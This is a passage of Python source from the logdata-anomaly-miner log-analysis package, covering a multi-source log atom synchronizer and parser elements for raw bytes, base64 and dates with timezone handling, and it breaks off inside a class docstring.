logging.getLogger(DEBUG_LOG_NAME).error(msg) raise TypeError(msg) self.continuous_timestamp_missing_warning = continuous_timestamp_missing_warning self.parser_model_dict = parser_model_dict self.log_resources = log_resources def get_atomizer_for_resource(self, resource_name): """Get an atomizer for a given resource. @param resource_name the resource name for atomizer selection is ignored in this type of factory. @return a StreamAtomizer object """ if self.log_resources is not None and resource_name in self.log_resources.keys(): resource = self.log_resources[resource_name] json = resource["json"] xml = resource["xml"] if json is None: json = self.json_format if xml is None: xml = self.xml_format parser = self.parsing_model if resource["parser_id"] is not None: parser = self.parser_model_dict[resource["parser_id"]] return ByteStreamLineAtomizer( parser, self.atom_handler_list, self.event_handler_list, 1 << 16, self.default_timestamp_path_list, self.eol_sep, json, xml, self.use_real_time, resource_name, self.continuous_timestamp_missing_warning) return ByteStreamLineAtomizer( self.parsing_model, self.atom_handler_list, self.event_handler_list, 1 << 16, self.default_timestamp_path_list, self.eol_sep, self.json_format, self.xml_format, self.use_real_time, resource_name, self.continuous_timestamp_missing_warning) SimpleMultisourceAtomSync.py000066400000000000000000000146461500476301700360130ustar00rootroot00000000000000logdata-anomaly-miner-2.8.0/source/root/usr/lib/logdata-anomaly-miner/aminer/input"""This module defines a handler that synchronizes different streams. This program is free software: you can redistribute it and/or modify it under the terms of the GNU General Public License as published by the Free Software Foundation, either version 3 of the License, or (at your option) any later version. 
This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details. You should have
received a copy of the GNU General Public License along with this program. If not, see .
"""
import time
import logging
from aminer.input.InputInterfaces import AtomHandlerInterface
from aminer.AminerConfig import DEBUG_LOG_NAME


class SimpleMultisourceAtomSync(AtomHandlerInterface):
    """This class synchronizes different atom streams by forwarding the atoms only from the source delivering the oldest ones.

    This is done using the atom timestamp value. Atoms without a timestamp are forwarded immediately. When no atoms are received
    from a source for some time, no more atoms are expected from that source. This will allow forwarding of blocked atoms from
    other sources afterwards.
    """

    def __init__(self, atom_handler_list, sync_wait_time=5):
        """Create the synchronizer.

        @param atom_handler_list forward atoms to all handlers in the list, no matter if the log_atom was handled or not.
        @param sync_wait_time seconds (int or float, bool rejected) to wait in blocking mode for atoms from other sources.
        @raise TypeError when atom_handler_list is empty/not a list of AtomHandlerInterface or sync_wait_time is not numeric.
        """
        if not atom_handler_list or not isinstance(atom_handler_list, list) or not all(
                isinstance(x, AtomHandlerInterface) for x in atom_handler_list):
            msg = "atom_handler_list must be a list of AtomHandlerInterface!"
            logging.getLogger(DEBUG_LOG_NAME).error(msg)
            raise TypeError(msg)
        self.atom_handler_list = atom_handler_list
        # bool is a subclass of int, so it has to be rejected explicitly.
        if isinstance(sync_wait_time, bool) or not isinstance(sync_wait_time, (int, float)):
            msg = "sync_wait_time must be a float or integer!"
            logging.getLogger(DEBUG_LOG_NAME).error(msg)
            raise TypeError(msg)
        self.sync_wait_time = sync_wait_time
        # Last forwarded log atom timestamp
        self.last_forward_timestamp = 0
        # The dictionary containing the currently active sources. Each entry is a list with two values:
        # * the largest timestamp of a LogAtom forwarded from this source so far.
        # * the current LogAtom pending to be forwarded or None if all atoms were forwarded
        self.sources_dict = {}
        # The local clock time when blocking was enabled for any source. Start in blocking mode to have chance to see atom from each
        # available source before forwarding the first ones. 0 means "not blocking".
        self.blocking_end_time = time.time() + self.sync_wait_time
        # Number of sources that were given a chance to submit an atom before blocking is entered again.
        self.blocking_sources = 0
        # Set once an atom older than the newest one already forwarded from the same source was seen.
        self.timestamps_unsorted_flag = False
        # Source of the most recently forwarded atom, or None; used together with buffer_empty_counter to let that source deliver
        # its next atom before atoms from other sources are considered.
        self.last_forwarded_source = None
        self.buffer_empty_counter = 0

    def receive_atom(self, log_atom):
        """Receive a log atom from a source.

        @return True when the atom was forwarded (to all handlers, regardless of whether any consumed it), False when it is held
        back — either because another source should deliver first, because the synchronizer is in blocking mode, or because a
        source is still idle and may deliver an older atom.
        """
        # Right after forwarding from one source, atoms from other sources are refused for up to 2 * (number of sources) calls so
        # the forwarding source can deliver its next atom first; presumably the caller retries refused atoms — confirm.
        if self.last_forwarded_source is not None and log_atom.source != self.last_forwarded_source and self.buffer_empty_counter < (
                2 * len(self.sources_dict.keys())):
            self.buffer_empty_counter += 1
            return False
        self.buffer_empty_counter = 0
        self.last_forwarded_source = None
        timestamp = log_atom.atom_time
        if timestamp is None:
            # Atoms without timestamp cannot be ordered, forward them immediately.
            self.forward_atom(log_atom)
            self.last_forwarded_source = log_atom.source
            return True
        source_info = self.sources_dict.get(log_atom.source)
        if source_info is None:
            source_info = [timestamp, log_atom]
            self.sources_dict[log_atom.source] = source_info
        else:
            if timestamp < source_info[0]:
                # Atoms not sorted, not our problem. Forward it immediately.
                self.timestamps_unsorted_flag = True
                self.forward_atom(log_atom)
                self.last_forwarded_source = log_atom.source
                return True
            if source_info[1] is None:
                source_info[1] = log_atom
        # Source information with the oldest pending atom.
        oldest_source_info = None
        has_idle_sources_flag = False
        for source_info in self.sources_dict.values():
            if source_info[1] is None:
                has_idle_sources_flag = True
                continue
            if oldest_source_info is None:
                oldest_source_info = source_info
                continue
            if source_info[1].atom_time < oldest_source_info[1].atom_time:
                oldest_source_info = source_info
        if self.blocking_end_time != 0:
            # We cannot do anything while blocking to catch more atoms.
            if self.blocking_end_time > time.time():
                return False
            # Blocking has expired, cleanup the blockers.
            # Sources without a pending atom are treated as gone; they are re-added on their next atom.
            expired_sources = []
            for source, source_info in self.sources_dict.items():
                if source_info[1] is None:
                    expired_sources.append(source)
            for source in expired_sources:
                del self.sources_dict[source]
            self.blocking_end_time = 0
            self.blocking_sources = 0
            has_idle_sources_flag = False
        if has_idle_sources_flag:
            # We cannot let this item pass. Before entering blocking state, give all other sources also the chance to submit an atom.
            if self.blocking_sources == len(self.sources_dict):
                self.blocking_end_time = time.time() + self.sync_wait_time
            else:
                self.blocking_sources += 1
            return False
        # No idle sources, just forward atom from the oldest one if that is really the currently active source.
        if log_atom != oldest_source_info[1]:
            return False
        self.forward_atom(log_atom)
        self.last_forwarded_source = log_atom.source
        oldest_source_info[1] = None
        if timestamp > oldest_source_info[0]:
            oldest_source_info[0] = timestamp
        self.blocking_sources = 0
        return True

    def forward_atom(self, log_atom):
        """Forward atom to all atom handlers.

        The handlers' return values are ignored: the atom counts as forwarded even if no handler consumed it.
        """
        for handler in self.atom_handler_list:
            handler.receive_atom(log_atom)
logdata-anomaly-miner-2.8.0/source/root/usr/lib/logdata-anomaly-miner/aminer/parsing/000077500000000000000000000000001500476301700306465ustar00rootroot00000000000000AnyByteDataModelElement.py000066400000000000000000000027111500476301700356020ustar00rootroot00000000000000logdata-anomaly-miner-2.8.0/source/root/usr/lib/logdata-anomaly-miner/aminer/parsing"""This module defines a model element that matches any byte.

This program is free software: you can redistribute it and/or modify it under the terms of the GNU General Public License as
published by the Free Software Foundation, either version 3 of the License, or (at your option) any later version.
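This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details. You should have
received a copy of the GNU General Public License along with this program. If not, see .
"""
from aminer.parsing.MatchElement import MatchElement
from aminer.parsing.ModelElementInterface import ModelElementInterface


class AnyByteDataModelElement(ModelElementInterface):
    """This class matches any byte but at least one.

    Thus, a match will always span the complete data from beginning to end.
    """

    def get_match_element(self, path: str, match_context):
        """Just return a match including all data from the context.

        @param path to be printed in the MatchElement.
        @param match_context the match_context to be analyzed.
        @return None when match_data is empty, otherwise a MatchElement whose match string and match object are both the complete
        remaining data. The match_context is advanced past all of it.
        """
        match_data = match_context.match_data
        if not match_data:
            return None
        match_context.update(match_data)
        return MatchElement(f"{path}/{self.element_id}", match_data, match_data, None)
Base64StringModelElement.py000066400000000000000000000044701500476301700356540ustar00rootroot00000000000000logdata-anomaly-miner-2.8.0/source/root/usr/lib/logdata-anomaly-miner/aminer/parsing"""This module provides base64 string matching.

This program is free software: you can redistribute it and/or modify it under the terms of the GNU General Public License as
published by the Free Software Foundation, either version 3 of the License, or (at your option) any later version.
This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details. You should have
received a copy of the GNU General Public License along with this program. If not, see .
"""
import base64
import re
from aminer import AminerConfig
from aminer.parsing.ModelElementInterface import ModelElementInterface
from aminer.parsing.MatchElement import MatchElement


class Base64StringModelElement(ModelElementInterface):
    """This class just tries to strip off as many base64 bytes as possible from a given data string."""

    def __init__(self, element_id: str):
        """Initialize the ModelElement.

        @param element_id an identifier for the ModelElement which is shown in the path.
        """
        super().__init__(element_id)
        # Anchored at the start: complete 4-byte groups, optionally followed by one padded final group. Because the pattern only
        # accepts whole groups with correct padding, the length of a match is always a multiple of four.
        self.regex = re.compile(b"^(?:[A-Za-z0-9+/]{4})*(?:[A-Za-z0-9+/]{2}==|[A-Za-z0-9+/]{3}=)?")

    def get_match_element(self, path: str, match_context):
        """Strip off the longest base64 prefix of the data and return it as a match.

        (The previous docstring described integer parsing; it was copied from another element.)
        @param path to be printed in the MatchElement.
        @param match_context the match_context to be analyzed.
        @return None when no base64 byte is found at the start of the data. Otherwise a MatchElement whose match string is the raw
        base64 bytes and whose match object is the decoded bytes — or the raw bytes again when the decoded value is not valid
        text in AminerConfig.ENCODING.
        """
        match = self.regex.match(match_context.match_data)
        # The pattern also matches the empty string, so an empty match means "no base64 here".
        if match is None or match.end() == 0:
            return None
        match_len = match.end()
        match_string = match_context.match_data[:match_len]
        match_context.update(match_string)
        try:
            match_value = base64.b64decode(match_string)
            # we need to check if no exception is raised when decoding the original string.
            match_value.decode(AminerConfig.ENCODING)
        except UnicodeDecodeError:
            match_value = match_string
        return MatchElement(f"{path}/{self.element_id}", match_string, match_value, None)
DateTimeModelElement.py000066400000000000000000001012761500476301700351370ustar00rootroot00000000000000logdata-anomaly-miner-2.8.0/source/root/usr/lib/logdata-anomaly-miner/aminer/parsing"""This module contains a datetime parser and helper classes for parsing.

This program is free software: you can redistribute it and/or modify it under the terms of the GNU General Public License as
published by the Free Software Foundation, either version 3 of the License, or (at your option) any later version.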
This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details. You should have received a copy of the GNU General Public License along with this program. If not, see . """ import sys import time import logging import locale from typing import Union, List, Set from datetime import timezone, datetime from aminer.AminerConfig import DEBUG_LOG_NAME from aminer.parsing.ModelElementInterface import ModelElementInterface from aminer.parsing.MatchElement import MatchElement timezone_info = { "A": 1 * 3600, "ACDT": 10.5 * 3600, "ACST": 9.5 * 3600, "ACT": -5 * 3600, "ACWST": 8.75 * 3600, "ADT": 4 * 3600, "AEDT": 11 * 3600, "AEST": 10 * 3600, "AET": 10 * 3600, "AFT": 4.5 * 3600, "AKDT": -8 * 3600, "AKST": -9 * 3600, "ALMT": 6 * 3600, "AMST": -3 * 3600, "AMT": -4 * 3600, "ANAST": 12 * 3600, "ANAT": 12 * 3600, "AQTT": 5 * 3600, "ART": -3 * 3600, "AST": 3 * 3600, "AT": -4 * 3600, "AWDT": 9 * 3600, "AWST": 8 * 3600, "AZOST": 0 * 3600, "AZOT": -1 * 3600, "AZST": 5 * 3600, "AZT": 4 * 3600, "AoE": -12 * 3600, "B": 2 * 3600, "BNT": 8 * 3600, "BOT": -4 * 3600, "BRST": -2 * 3600, "BRT": -3 * 3600, "BST": 6 * 3600, "BTT": 6 * 3600, "C": 3 * 3600, "CAST": 8 * 3600, "CAT": 2 * 3600, "CCT": 6.5 * 3600, "CDT": -5 * 3600, "CEST": 2 * 3600, "CET": 1 * 3600, "CHADT": 13.75 * 3600, "CHAST": 12.75 * 3600, "CHOST": 9 * 3600, "CHOT": 8 * 3600, "CHUT": 10 * 3600, "CIDST": -4 * 3600, "CIST": -5 * 3600, "CKT": -10 * 3600, "CLST": -3 * 3600, "CLT": -4 * 3600, "COT": -5 * 3600, "CST": -6 * 3600, "CT": -6 * 3600, "CVT": -1 * 3600, "CXT": 7 * 3600, "ChST": 10 * 3600, "D": 4 * 3600, "DAVT": 7 * 3600, "DDUT": 10 * 3600, "E": 5 * 3600, "EASST": -5 * 3600, "EAST": -6 * 3600, "EAT": 3 * 3600, "ECT": -5 * 3600, "EDT": -4 * 3600, "EEST": 3 * 3600, "EET": 2 * 3600, "EGST": 0 * 3600, "EGT": -1 * 3600, "EST": -5 * 3600, "ET": -5 * 3600, "F": 6 * 
3600, "FET": 3 * 3600, "FJST": 13 * 3600, "FJT": 12 * 3600, "FKST": -3 * 3600, "FKT": -4 * 3600, "FNT": -2 * 3600, "G": 7 * 3600, "GALT": -6 * 3600, "GAMT": -9 * 3600, "GET": 4 * 3600, "GFT": -3 * 3600, "GILT": 12 * 3600, "GMT": 0 * 3600, "GST": 4 * 3600, "GYT": -4 * 3600, "H": 8 * 3600, "HDT": -9 * 3600, "HKT": 8 * 3600, "HOVST": 8 * 3600, "HOVT": 7 * 3600, "HST": -10 * 3600, "I": 9 * 3600, "ICT": 7 * 3600, "IDT": 3 * 3600, "IOT": 6 * 3600, "IRDT": 4.5 * 3600, "IRKST": 9 * 3600, "IRKT": 8 * 3600, "IRST": 3.5 * 3600, "IST": 5.5 * 3600, "JST": 9 * 3600, "K": 10 * 3600, "KGT": 6 * 3600, "KOST": 11 * 3600, "KRAST": 8 * 3600, "KRAT": 7 * 3600, "KST": 9 * 3600, "KUYT": 4 * 3600, "L": 11 * 3600, "LHDT": 11 * 3600, "LHST": 10.5 * 3600, "LINT": 14 * 3600, "M": 12 * 3600, "MAGST": 12 * 3600, "MAGT": 11 * 3600, "MART": 9.5 * 3600, "MAWT": 5 * 3600, "MDT": -6 * 3600, "MHT": 12 * 3600, "MMT": 6.5 * 3600, "MSD": 4 * 3600, "MSK": 3 * 3600, "MST": -7 * 3600, "MT": -7 * 3600, "MUT": 4 * 3600, "MVT": 5 * 3600, "MYT": 8 * 3600, "N": -1 * 3600, "NCT": 11 * 3600, "NDT": 2.5 * 3600, "NFT": 11 * 3600, "NOVST": 7 * 3600, "NOVT": 7 * 3600, "NPT": 5.5 * 3600, "NRT": 12 * 3600, "NST": 3.5 * 3600, "NUT": -11 * 3600, "NZDT": 13 * 3600, "NZST": 12 * 3600, "O": -2 * 3600, "OMSST": 7 * 3600, "OMST": 6 * 3600, "ORAT": 5 * 3600, "P": -3 * 3600, "PDT": -7 * 3600, "PET": -5 * 3600, "PETST": 12 * 3600, "PETT": 12 * 3600, "PGT": 10 * 3600, "PHOT": 13 * 3600, "PHT": 8 * 3600, "PKT": 5 * 3600, "PMDT": -2 * 3600, "PMST": -3 * 3600, "PONT": 11 * 3600, "PST": -8 * 3600, "PT": -8 * 3600, "PWT": 9 * 3600, "PYST": -3 * 3600, "PYT": -4 * 3600, "Q": -4 * 3600, "QYZT": 6 * 3600, "R": -5 * 3600, "RET": 4 * 3600, "ROTT": -3 * 3600, "S": -6 * 3600, "SAKT": 11 * 3600, "SAMT": 4 * 3600, "SAST": 2 * 3600, "SBT": 11 * 3600, "SCT": 4 * 3600, "SGT": 8 * 3600, "SRET": 11 * 3600, "SRT": -3 * 3600, "SST": -11 * 3600, "SYOT": 3 * 3600, "T": -7 * 3600, "TAHT": -10 * 3600, "TFT": 5 * 3600, "TJT": 5 * 3600, "TKT": 13 * 3600, 
"TLT": 9 * 3600, "TMT": 5 * 3600, "TOST": 14 * 3600, "TOT": 13 * 3600, "TRT": 3 * 3600, "TVT": 12 * 3600, "U": -8 * 3600, "ULAST": 9 * 3600, "ULAT": 8 * 3600, "UTC": 0 * 3600, "UYST": -2 * 3600, "UYT": -3 * 3600, "UZT": 5 * 3600, "V": -9 * 3600, "VET": -4 * 3600, "VLAST": 11 * 3600, "VLAT": 10 * 3600, "VOST": 6 * 3600, "VUT": 11 * 3600, "W": -10 * 3600, "WAKT": 12 * 3600, "WARST": -3 * 3600, "WAST": 2 * 3600, "WAT": 1 * 3600, "WEST": 1 * 3600, "WET": 0 * 3600, "WFT": 12 * 3600, "WGST": -2 * 3600, "WGT": -3 * 3600, "WIB": 7 * 3600, "WIT": 9 * 3600, "WITA": 8 * 3600, "WST": 14 * 3600, "WT": 0 * 3600, "X": -11 * 3600, "Y": -12 * 3600, "YAKST": 10 * 3600, "YAKT": 9 * 3600, "YAPT": 10 * 3600, "YEKST": 6 * 3600, "YEKT": 5 * 3600, "Z": 0 * 3600} search_tz_dict = {} keys = list(timezone_info.keys()) keys.sort() for idx in range(65, 91): search_tz_dict[idx] = [x.encode() for x in keys if x.encode()[0] == idx] search_tz_dict[idx].sort(key=len, reverse=True) # sorts by descending length class DateTimeModelElement(ModelElementInterface): """This class defines a model element to parse date or datetime values. The element is similar to the strptime function but does not use it due to the numerous problems associated with it, e.g. no leap year support for semiqualified years, no %s (seconds since epoch) format in Python strptime, no %f support in libc strptime, no support to determine the length of the parsed string. """ def __init__(self, element_id: str, date_format: bytes, time_zone: timezone = None, text_locale: Union[str, tuple] = None, start_year: int = None, max_time_jump_seconds: int = 86400, timestamp_scale: int = 1): """Create a DateTimeModelElement to parse dates using a custom, timezone and locale-aware implementation similar to strptime. @param element_id an identifier for the ModelElement which is shown in the path. @param date_format, is a byte string that represents the date format for parsing, see Python strptime specification for available formats. 
Supported format specifiers are: * %b: month name in current locale * %d: day in month, can be space or zero padded when followed by separator or at end of string. * %f: fraction of seconds (the digits after the ".") * %H: hours from 00 to 23 * %M: minutes * %m: two-digit month number * %S: seconds * %s: seconds since the epoch (1970-01-01) * %Y: 4 digit year number * %z: detect and parse timezone strings like UTC, CET, +0001, etc. automatically. Common formats are: * "%b %d %H:%M:%S" e.g. for "Nov 19 05:08:43" * "%d.%m.%YT%H:%M:%S" e.g. for "07.02.2019T11:40:00" * "%d.%m.%Y %H:%M:%S.%f" e.g. for "07.02.2019 11:40:00.123456" * "%d.%m.%Y %H:%M:%S%z" e.g. for "07.02.2019 11:40:00+0000" or "07.02.2019 11:40:00 UTC" * "%d.%m.%Y" e.g. for "07.02.2019" * "%H:%M:%S" e.g. for "11:40:23" @param time_zone the timezone for parsing the values or UTC when None. @param text_locale the locale to use for parsing the day, month names or None to use the default locale. The locale must be a tuple of (locale, encoding) or a string. @param start_year when parsing date records without any year information, assume this is the year of the first value parsed. @param max_time_jump_seconds for detection of year wraps with date formats missing year information, also the current time of values has to be tracked. This value defines the window within that the time may jump between two matches. When not within that window, the value is still parsed, corrected to the most likely value but does not change the detection year. @param timestamp_scale scales the seconds in %s to get seconds (=1), milliseconds (=1000), microseconds (=1000000), etc. 
""" self.text_locale = text_locale super().__init__(element_id, date_format=date_format, time_zone=time_zone, text_locale=text_locale, start_year=start_year, max_time_jump_seconds=max_time_jump_seconds, timestamp_scale=timestamp_scale) if time_zone is None: self.time_zone = timezone.utc # Make sure that date_format is valid and extract the relevant parts from it. self.format_has_year_flag = False self.format_has_tz_specifier = False self.date_format_parts: Union[List[Union[bytes, tuple]]] = [] self.scan_date_format(date_format) if (not self.format_has_year_flag) and (start_year is None): self.start_year = time.gmtime(None).tm_year elif start_year is None: # this is needed so start_year is at any point an integer. (instead of being None) self.start_year = 0 self.last_parsed_seconds = 0 self.epoch_start_time = datetime.fromtimestamp(0, self.time_zone) def scan_date_format(self, date_format: bytes): """Scan the date format.""" if len(self.date_format_parts) > 0: msg = "Cannot rescan date format after initialization" logging.getLogger(DEBUG_LOG_NAME).error(msg) raise Exception(msg) date_format_parts: List[Union[bytes, tuple]] = [] date_format_type_set: Set[int] = set() scan_pos = 0 while scan_pos < len(date_format): next_param_pos = date_format.find(b"%", scan_pos) if next_param_pos < 0: next_param_pos = len(date_format) new_element: Union[bytes, tuple, None] = None if next_param_pos != scan_pos: new_element = date_format[scan_pos:next_param_pos] else: param_type_code = date_format[next_param_pos + 1:next_param_pos + 2] next_param_pos = scan_pos + 2 if param_type_code == b"%": new_element = b"%" elif param_type_code == b"b": import calendar name_dict = {} for month_pos in range(1, 13): name_dict[calendar.month_name[month_pos][:3].encode()] = month_pos new_element = (1, 3, name_dict) elif param_type_code == b"d": new_element = (2, 2, int) elif param_type_code == b"f": new_element = (6, -1, DateTimeModelElement.parse_fraction) elif param_type_code == b"H": new_element = 
(3, 2, int) elif param_type_code == b"M": new_element = (4, 2, int) elif param_type_code == b"m": new_element = (1, 2, int) elif param_type_code == b"S": new_element = (5, 2, int) elif param_type_code == b"s": new_element = (7, -1, int) elif param_type_code == b"Y": self.format_has_year_flag = True new_element = (0, 4, int) elif param_type_code == b"z": self.format_has_tz_specifier = True scan_pos = next_param_pos continue else: msg = f"Unknown dateformat specifier {repr(param_type_code)}" logging.getLogger(DEBUG_LOG_NAME).error(msg) raise ValueError(msg) if isinstance(new_element, bytes): if date_format_parts and (isinstance(date_format_parts[-1], bytes)): date_format_parts[-1] += new_element else: date_format_parts.append(new_element) else: if new_element[0] in date_format_type_set: msg = f"Multiple format specifiers for type {new_element[0]}" logging.getLogger(DEBUG_LOG_NAME).error(msg) raise ValueError(msg) date_format_type_set.add(new_element[0]) date_format_parts.append(new_element) scan_pos = next_param_pos if (7 in date_format_type_set) and (not date_format_type_set.isdisjoint(set(range(0, 6)))): msg = "Cannot use %s (seconds since epoch) with other non-second format types" logging.getLogger(DEBUG_LOG_NAME).error(msg) raise ValueError(msg) self.date_format_parts = date_format_parts def get_match_element(self, path: str, match_context): """Try to find a match on given data for this model element and all its children. When a match is found, the match_context is updated accordingly. @param path to be printed in the MatchElement. @param match_context the match_context to be analyzed. @return None when there is no match, MatchElement otherwise. The match_object returned is a tuple containing the datetime object and the seconds since 1970. 
""" parse_pos = 0 # Year, month, day, hour, minute, second, fraction, gmt-seconds: result: List = [0, 0, 0, 0, 0, 0, 0, 0] for part_pos, date_format_part in enumerate(self.date_format_parts): if isinstance(date_format_part, bytes): if not match_context.match_data[parse_pos:].startswith(date_format_part): return None parse_pos += len(date_format_part) continue next_length = date_format_part[1] next_data = None if next_length < 0: # No length given: this is only valid for integer fields or fields followed by a separator string. if (part_pos + 1) < len(self.date_format_parts): next_part = self.date_format_parts[part_pos + 1] if isinstance(next_part, bytes): end_pos = match_context.match_data.find(next_part, parse_pos) if end_pos < 0: return None next_length = end_pos - parse_pos if next_length < 0: # No separator, so get the number of decimal digits. next_length = 0 for digit_ord in match_context.match_data[parse_pos:]: if (digit_ord < 0x30) or (digit_ord > 0x39): break next_length += 1 if next_length == 0: return None next_data = match_context.match_data[parse_pos:parse_pos + next_length] else: next_data = match_context.match_data[parse_pos:parse_pos + next_length] if len(next_data) != next_length: return None parse_pos += next_length transform_function = date_format_part[2] if isinstance(transform_function, dict): value = None try: value = transform_function.get(next_data, None) except ValueError: pass if value is None: return None result[date_format_part[0]] = value else: try: result[date_format_part[0]] = transform_function(next_data) except ValueError: # Parsing failed, most likely due to wrong format. return None date_str = match_context.match_data[:parse_pos] result[7] /= self.timestamp_scale # Now combine the values and build the final value. parsed_date_time = None total_seconds = result[7] if total_seconds != 0: total_seconds += result[6] # For epoch second formats, the datetime value usually is not important. So stay with parsed_date_time to none. 
else: if not self.format_has_year_flag: result[0] = self.start_year microseconds = int(result[6] * 1000000) try: if 0 in (result[0], result[1], result[2]): current_date = datetime.now() if result[0] == 0: result[0] = current_date.year if result[1] == 0: result[1] = current_date.month if result[2] == 0: result[2] = current_date.day parsed_date_time = datetime(result[0], result[1], result[2], result[3], result[4], result[5], microseconds, self.time_zone) except ValueError: # The values did not form a valid datetime object, e.g. when the day of month is out of range. The rare case where dates # without year are parsed and the last parsed timestamp was from the previous non-leap year but the current timestamp is it, # is ignored. Values that sparse and without a year number are very likely to result in invalid data anyway. return None # Avoid timedelta.total_seconds(), not supported in Python 2.6. delta = parsed_date_time - self.epoch_start_time total_seconds = (delta.days * 86400 + delta.seconds) # See if this is change from one year to next. if not self.format_has_year_flag: if self.last_parsed_seconds == 0: # There cannot be a wraparound if we do not know any previous time values yet. self.last_parsed_seconds = total_seconds else: delta_seconds = self.last_parsed_seconds - total_seconds if abs(delta_seconds) <= self.max_time_jump_seconds: self.last_parsed_seconds = total_seconds else: # This might be the first date value for the next year or one from the previous. # Test both cases and see, what is more likely. 
date_error = False try: next_year_date_time = parsed_date_time.replace(self.start_year + 1) delta = next_year_date_time - self.epoch_start_time next_year_total_seconds = (delta.days * 86400 + delta.seconds) except ValueError: date_error = True if not date_error and next_year_total_seconds - self.last_parsed_seconds <= self.max_time_jump_seconds: self.start_year += 1 parsed_date_time = next_year_date_time total_seconds = next_year_total_seconds self.last_parsed_seconds = total_seconds msg = f"DateTimeModelElement unqualified timestamp year wraparound detected from " \ f"{datetime.fromtimestamp(self.last_parsed_seconds, self.time_zone).isoformat()} to " \ f"{parsed_date_time.isoformat()}" logging.getLogger(DEBUG_LOG_NAME).warning(msg) print("WARNING: " + msg, file=sys.stderr) else: try: last_year_date_time = parsed_date_time.replace(self.start_year - 1) delta = last_year_date_time - self.epoch_start_time last_year_total_seconds = (delta.days * 86400 + delta.seconds) except ValueError: date_error = True if not date_error and self.last_parsed_seconds - last_year_total_seconds <= self.max_time_jump_seconds: parsed_date_time = last_year_date_time total_seconds = last_year_total_seconds self.last_parsed_seconds = total_seconds else: # None of both seems correct, just report that. msg = f"DateTimeModelElement time inconsistencies parsing {repr(date_str)}, expecting value around " \ f"{self.last_parsed_seconds}. Check your settings!" logging.getLogger(DEBUG_LOG_NAME).warning(msg) print("WARNING: " + msg, file=sys.stderr) # We discarded the parsed_date_time microseconds beforehand, use the full float value here instead of the rounded integer. if result[6] is not None: total_seconds += result[6] if self.format_has_tz_specifier: valid_tz_specifier = True offset_allowed = True tz_specifier_offset = 0. if match_context.match_data[parse_pos] == ord(b" "): parse_pos += 1 resulting_key = None # only if the next character is in A-Z, a valid resulting_key can exist. 
if match_context.match_data[parse_pos] in search_tz_dict: # search the first fitting resulting_key in the sorted tz_dict and break the loop. for key in search_tz_dict[match_context.match_data[parse_pos]]: if match_context.match_data[parse_pos:].startswith(key): resulting_key = key break # an offset is only allowed with UTC and GMT. if resulting_key not in (b"UTC", b"GMT"): offset_allowed = False if resulting_key is not None: # get the offset from the timezone_info dict. tz_specifier_offset = timezone_info[resulting_key.decode()] parse_pos += len(resulting_key) if match_context.match_data[parse_pos] in (ord(b"+"), ord(b"-")) and offset_allowed and valid_tz_specifier: sign = -1 if match_context.match_data[parse_pos] == ord(b"+"): sign = 1 parse_pos += 1 cnt_digits = 0 colon_shift = 0 # parse data as long as there is more data. while parse_pos < len(match_context.match_data): # shift the position and count to the next position, if the current character is a digit. if chr(match_context.match_data[parse_pos]).isdigit(): cnt_digits += 1 parse_pos += 1 # if the current character is no digit and cnt_digits is 2, a colon is allowed. elif cnt_digits == 2 and match_context.match_data[parse_pos] == ord(b":"): parse_pos += 1 colon_shift = 1 else: break # if the digit count is not 4 and a colon is found, then no colon shift should be applied. This could be the case, if a # colon follows the date (02.11.2021 UTC+01: some text) if cnt_digits != 4 and colon_shift == 1: parse_pos -= 1 colon_shift = 0 # if the digits count is zero or bigger than 4, then the specifier is not valid. if cnt_digits == 0 or cnt_digits > 4: valid_tz_specifier = False else: # only one hour position was found. if cnt_digits == 1: tz_specifier_offset = sign * int(chr(match_context.match_data[parse_pos-1])) * 3600 # two hours specifiers were found. 
    @staticmethod
    def parse_fraction(value_str: bytes):
        """Turn the digit bytes following a decimal separator into their fractional value.

        The method is handed to the parsing logic as a function pointer, which is why it keeps a single bytes argument.
        @param value_str the raw digit bytes after the separator, e.g. b"25".
        @return the float value of "0." followed by value_str, e.g. 0.25 for b"25".
        """
        fraction_text = b"".join((b"0.", value_str))
        return float(fraction_text)
class MultiLocaleDateTimeModelElement(ModelElementInterface):
    """
    This class defines a model element to parse date or datetime values from log sources.
    The date or datetime can contain timestamps encoded in different locales or on machines, where host/service locale does not match
    data locale(s). Internally one DateTimeModelElement is created per configured format and matching is delegated to them in list order.
    CAVEAT: Unlike other model elements, this element is not completely stateless! As parsing of semi qualified date values without any
    year information may produce wrong results, e.g. wrong year or 1 day off due to incorrect leap year handling, this object will keep
    track of the most recent timestamp parsed and will use it to regain information about the year in semi qualified date values. Still
    this element will not complain when parsed timestamp values are not strictly sorted, this should be done by filtering modules later
    on. The sorting requirements here are only, that each new timestamp value may not be more than 2 days before and 1 month after the
    most recent one observed.
    Second CAVEAT: every match attempt switches the process-wide locale via locale.setlocale() for the format being tried and does not
    switch it back afterwards. The element is therefore not safe to use from several threads and influences every other
    locale-dependent call in the process.

    Internal operation:
    * When creating the object, make sure that there are no ambiguous dateFormats in the list, e.g. one with "day month" and another one
      with "month day".
    * To avoid decoding of binary input data in all locales before searching for e.g. month names, convert all possible month names to
      bytes during object creation and just keep the lookup list.
    """

    def __init__(self, element_id: str, date_formats: list, start_year: int = None, max_time_jump_seconds: int = 86400) -> None:
        """Create a new MultiLocaleDateTimeModelElement object.
        @param element_id an identifier for the ModelElement which is shown in the path.
        @param date_formats this parameter is a list of tuples, each tuple containing information about one date format to support. The
        tuple structure is (format_string, format_timezone, format_locale). The format_string may contain the same elements as supported
        by strptime from datetime.datetime. The format_locale defines the locale for the string content, e.g. de_DE for german, but also
        the data IO encoding, e.g. ISO-8859-1. The locale information has to be available, e.g. using "locale-gen" on Debian systems.
        The format_timezone can be used to define the timezone of the timestamp parsed. When None, UTC is used. The timezone support may
        only be sufficient for very simple use-cases, e.g. all data from one source configured to create timestamps in that timezone.
        @param start_year when given, parsing will use this year value for semi qualified timestamps to add correct year information.
        This is especially relevant for historic datasets as otherwise leap year handling may fail. The startYear parameter will only
